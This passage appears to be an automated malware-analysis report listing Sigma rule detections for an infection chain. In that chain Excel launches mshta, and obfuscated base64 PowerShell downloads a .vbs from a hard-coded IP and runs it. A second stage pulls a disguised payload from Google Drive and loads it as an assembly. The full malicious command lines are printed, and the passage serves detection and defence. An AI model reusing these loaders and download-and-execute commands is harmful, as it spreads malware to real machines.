l0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVu
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", CommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3460, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3720, ProcessName: mshta.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE, ProcessId: 3968, ProcessName: powershell.exe
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , ProcessId: 3196, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVu
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline", ProcessId: 4068, ProcessName: csc.exe
          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.162.95, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3460, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3820, TargetFilename: C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3460, Protocol: tcp, SourceIp: 172.67.162.95, SourceIsIpv6: false, SourcePort: 443
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; 